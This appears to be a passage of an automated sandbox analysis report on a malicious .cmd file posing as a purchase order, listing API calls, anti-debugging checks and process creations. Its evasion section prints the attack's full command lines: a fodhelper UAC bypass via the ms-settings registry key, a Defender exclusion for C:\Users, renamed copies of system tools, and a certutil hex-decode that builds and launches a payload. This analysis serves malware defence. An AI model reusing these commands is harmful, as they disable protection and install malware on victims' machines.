Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106F7A7 Sleep,ExitProcess,36_2_2106F7A7
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: c:\users\public\xkn.exe - Key value queried: Powershell behavior
Source: C:\Users\Public\xkn.exe - Memory allocated: 15A30F30000 memory reserve | memory write watch
Source: C:\Users\Public\xkn.exe - Memory allocated: 15A32730000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,28_2_1BA0A748
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,36_2_2107A748
Source: C:\Users\Public\xkn.exe - Thread delayed: delay time: 922337203685477 (2 entries)
Source: C:\Users\Public\xkn.exe - Window / User API: threadDelayed 3177
Source: C:\Users\Public\xkn.exe - Window / User API: threadDelayed 1694
Source: C:\Users\Public\Libraries\sppsvc.pif - Window / User API: threadDelayed 380
Source: C:\Users\Public\Libraries\sppsvc.pif - Window / User API: threadDelayed 9329
Source: C:\Users\Public\Libraries\sppsvc.pif - Window / User API: foregroundWindowGot 1751
Source: C:\Users\Public\alpha.exe - Evaded block: after key decision graph_4-16877
Source: C:\Users\Public\alpha.exe - Evaded block: after key decision graph_6-16877
Source: C:\Users\Public\alpha.exe - Evaded block: after key decision
Source: C:\Users\Public\alpha.exe - API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe - API coverage: 8.1 %
Source: C:\Users\Public\kn.exe - API coverage: 0.8 %
Source: C:\Users\Public\Libraries\sppsvc.pif - API coverage: 10.0 %
Source: C:\Users\Public\alpha.exe - API coverage: 9.6 %
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - API coverage: 6.5 %
Source: C:\Users\Public\xkn.exe TID: 5036 - Thread sleep count: 3177 > 30
Source: C:\Users\Public\xkn.exe TID: 5036 - Thread sleep count: 1694 > 30
Source: C:\Users\Public\xkn.exe TID: 7960 - Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\xkn.exe TID: 5704 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 8048 - Thread sleep time: -58500s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780 - Thread sleep time: -1140000s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780 - Thread sleep time: -27987000s >= -30000s
Source: C:\Users\Public\alpha.exe - WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Users\Public\alpha.exe - WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed (2 entries)
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF789BE7B4C
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF789BE7B4C
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,25_2_00007FF67DEB5E58
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,25_2_00007FF67DF119F8
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,25_2_00007FF67DEBDBC0
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,25_2_00007FF67DF11B04
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,25_2_00007FF67DEF3674
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,25_2_00007FF67DEBD4A4
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,25_2_00007FF67DF16F80
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF110C4
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF13100
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,25_2_00007FF67DF1234C
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_1B9FBB30
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_1B9FC34D
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_1BA0C291
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA09AF5 FindFirstFileW,28_2_1BA09AF5
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,28_2_1B9F880C
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,28_2_1B9F783C
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_1B9F9665
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_1B9FBD37
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA3E879 FindFirstFileExA,28_2_1BA3E879
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,29_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,29_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,29_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,29_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,29_2_00007FF789BE7B4C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,36_2_029A5878
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,36_2_2106C34D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069253
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,36_2_2107C291
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069665
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,36_2_2106880C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106783C FindFirstFileW,FindNextFileW,36_2_2106783C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_210AE879 FindFirstFileExA,36_2_210AE879
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,36_2_21079AF5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,36_2_2106BD37
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,36_2_21067C97
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,25_2_00007FF67DEF511C
Source: Kpeyvroh.PIF, 00000026.00000002.2504569132.0000000000652000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Kpeyvroh.PIF, 00000024.00000002.2419249499.000000000071E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
Source: C:\Users\Public\Libraries\sppsvc.pif - API call chain: ExitProcess graph end node (3 entries)
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - API call chain: ExitProcess graph end node
Source: C:\Users\Public\xkn.exe - Process information queried: ProcessInformation
Anti Debugging

Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BE63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF789BE63FC
Source: C:\Users\Public\ger.exe - Code function: 14_2_00007FF65588A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,14_2_00007FF65588A29C
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress,28_2_1B9F6A63
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA332B5 mov eax, dword ptr fs:[00000030h] 28_2_1BA332B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_210A32B5 mov eax, dword ptr fs:[00000030h] 36_2_210A32B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_029E53AD mov eax, dword ptr fs:[00000030h] 36_2_029E53AD
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
Source: C:\Users\Public\xkn.exe - Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe - Process token adjusted: Debug
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe - Code function: 4_2_00007FF789BD93B0 SetUnhandledExceptionFilter,4_2_00007FF789BD93B0
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe - Code function: 6_2_00007FF789BD93B0 SetUnhandledExceptionFilter,6_2_00007FF789BD93B0
Source: C:\Users\Public\ger.exe - Code function: 14_2_00007FF65588ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF65588ED50
Source: C:\Users\Public\ger.exe - Code function: 14_2_00007FF65588F050 SetUnhandledExceptionFilter,14_2_00007FF65588F050
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF453E0 SetUnhandledExceptionFilter,25_2_00007FF67DF453E0
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DF44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00007FF67DF44E18
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA2BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA2BB22
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA24B47 SetUnhandledExceptionFilter,28_2_1BA24B47
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA249F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA249F8
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA249F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_1BA249F9
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA24FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_1BA24FDC
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe - Code function: 29_2_00007FF789BD93B0 SetUnhandledExceptionFilter,29_2_00007FF789BD93B0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_210949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_210949F9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_2109BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_2109BB22
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21094B47 SetUnhandledExceptionFilter,36_2_21094B47
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: 36_2_21094FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_21094FDC
Source: C:\Users\Public\xkn.exe - Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe - Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe - Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe - Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\extrac32.exe - File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\extrac32.exe - File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF - Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 36_2_210720F7
Source: C:\Users\Public\kn.exe - Code function: 25_2_00007FF67DEF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,25_2_00007FF67DEF7024
Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1BA09627 mouse_event,28_2_1BA09627
Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\alpha.exe - Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe - Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\xkn.exe - Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\Public\alpha.exe - Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe - Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe - Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe - Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe (2 entries)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe " Jump to behavior
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF272B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,25_2_00007FF67DF272B0
